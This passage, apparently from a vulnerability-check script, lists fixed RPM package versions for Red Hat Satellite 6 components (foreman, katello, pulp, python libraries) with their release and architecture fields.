'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'candlepin-3.1.26-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'candlepin-selinux-3.1.26-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'crane-selinux-3.5.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'createrepo_c-0.17.1-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'createrepo_c-libs-0.17.1-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-bootloaders-redhat-202005201200-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-cli-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-debug-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-discovery-image-3.7.4-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'foreman-discovery-image-service-1.0.0-4.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-discovery-image-service-tui-1.0.0-4.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-dynflow-sidekiq-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-ec2-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-gce-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-installer-2.3.1.10-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'foreman-installer-katello-2.3.1.10-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'foreman-journald-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-libvirt-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-openstack-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-ovirt-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-postgresql-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-proxy-2.3.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-proxy-content-3.18.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-proxy-journald-2.3.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-proxy-selinux-2.3.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-selinux-2.3.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-service-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-telemetry-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'foreman-vmware-2.3.1.20-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'hfsplus-tools-332.14-12.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'katello-3.18.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'katello-certs-tools-2.7.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'katello-client-bootstrap-1.7.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'katello-common-3.18.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'katello-debug-3.18.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'katello-selinux-3.5.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'keycloak-httpd-client-install-1.2.2-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'kobo-0.5.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'libcomps-0.1.15-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'libmodulemd-1.7.0-1.pulp.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'libmodulemd2-2.9.3-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'libsolv-0.7.12-2.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'libwebsockets-2.4.2-2.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'livecd-tools-20.4-1.6.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'mod_passenger-4.0.18-24.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'mod_xsendfile-0.12-11.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'ostree-2017.1-2.atomic.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pcp-mmvstatsd-0.4-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-admin-client-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-docker-admin-extensions-3.2.9-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-docker-plugins-3.2.9-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-katello-1.0.3-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-maintenance-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-nodes-child-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-nodes-common-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-nodes-parent-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-ostree-admin-extensions-1.3.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-ostree-plugins-1.3.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-puppet-admin-extensions-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-puppet-plugins-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-puppet-tools-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-rpm-admin-extensions-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-rpm-plugins-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-selinux-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulp-server-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pulpcore-selinux-1.2.3-2.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'puppet-agent-6.19.1-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'puppet-agent-oauth-0.5.1-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'puppet-foreman_scap_client-0.4.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'puppetlabs-stdlib-5.2.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'puppetserver-6.14.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'pycairo-1.16.3-9.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-blinker-1.3-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-bson-3.2-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-gnupg-0.3.7-1.el7ui', 'release':'7', 'el_string':'el7ui', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-gofer-2.12.5-7.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-gofer-qpid-2.12.5-7.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-imgcreate-20.4-1.6.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'python-kid-0.9.6-11.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-mongoengine-0.10.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-nectar-1.6.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-oauth2-1.5.211-8.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-agent-lib-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-bindings-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-client-lib-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-common-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-docker-common-3.2.9-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-integrity-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-oid_validation-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-ostree-common-1.3.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-puppet-common-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-repoauth-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-rpm-common-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pulp-streamer-2.21.5-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pymongo-3.2-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-pymongo-gridfs-3.2-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-qpid-1.35.0-5.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-qpid-proton-0.28.0-4.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-qpid-qmf-1.36.0-28.el7amq', 'cpu':'x86_64', 'release':'7', 'el_string':'el7amq', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-saslwrapper-0.22-5.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-semantic_version-2.2.0-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-simplejson-3.2.0-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python-zope-interface-4.0.5-4.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-amqp-2.2.2-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-ansible-runner-1.4.6-1.el7ar', 'release':'7', 'el_string':'el7ar', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-anyjson-0.3.3-11.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-billiard-3.5.0.3-3.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'python2-celery-4.0.2-9.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-click-6.7-9.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-crane-3.3.1-9.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-daemon-2.1.2-7.el7at', 'release':'7', 'el_string':'el7at', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-django-1.11.29-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-flask-0.12.2-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'python2-future-0.16.0-11.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-gobject-3.28.3-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-gobject-base-3.28.3-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-isodate-0.5.4-12.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-itsdangerous-0.24-15.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-jinja2-2.10-10.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-jmespath-0.9.0-6.el7_7', 'release':'7', 'el_string':'el7_7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-keycloak-httpd-client-install-1.2.2-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-kombu-4.0.2-14.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'10', 'exists_check':'satellite-6'},\n {'reference':'python2-lockfile-0.11.0-10.el7ar', 'release':'7', 'el_string':'el7ar', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'exists_check':'satellite-6'},\n {'reference':'python2-markupsafe-0.23-21.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-okaara-1.0.37-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-pexpect-4.6-1.el7at', 'release':'7', 'el_string':'el7at', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-psutil-5.7.2-2.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-ptyprocess-0.5.2-3.el7at', 'release':'7', 'el_string':'el7at', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-pycurl-7.43.0.2-4.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-solv-0.7.12-2.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-twisted-16.4.1-12.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python2-vine-1.1.3-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'epoch':'10', 'exists_check':'satellite-6'},\n {'reference':'python2-werkzeug-0.12.2-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-aiodns-2.0.0-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-aiofiles-0.6.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-aiohttp-3.6.2-4.el7ar', 'cpu':'x86_64', 'release':'7', 'el_string':'el7ar', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-async-timeout-3.0.1-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-attrs-19.3.0-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-backoff-1.10.0-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-cairo-1.10.0-25.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-certifi-2020.6.20-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-cffi-1.14.3-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-chardet-3.0.4-10.el7ar', 'release':'7', 'el_string':'el7ar', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-chardet-3.0.4-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-click-7.1.2-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-createrepo_c-0.17.1-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-cryptography-2.9.2-1.el7pc', 'cpu':'x86_64', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-dateutil-2.8.1-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-defusedxml-0.6.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-diff-match-patch-20200713-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-2.2.18-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-currentuser-0.5.1-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-filter-2.3.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-guardian-2.3.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-import-export-2.3.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-lifecycle-0.8.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-prometheus-2.1.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-django-readonly-field-1.0.5-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-djangorestframework-3.11.2-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-djangorestframework-queryfields-1.0.0-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-drf-access-policy-0.7.0-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-drf-nested-routers-0.91-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-drf-spectacular-0.9.13-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-dynaconf-3.1.2-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-ecdsa-0.13.3-2.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-et-xmlfile-1.0.1-1.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-future-0.18.2-3.el7pc', 'release':'7', 'el_string':'el7pc', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'python3-gnupg-0.4.6-3.el7pc', 'release':'7', 'el_string':'el7pc', 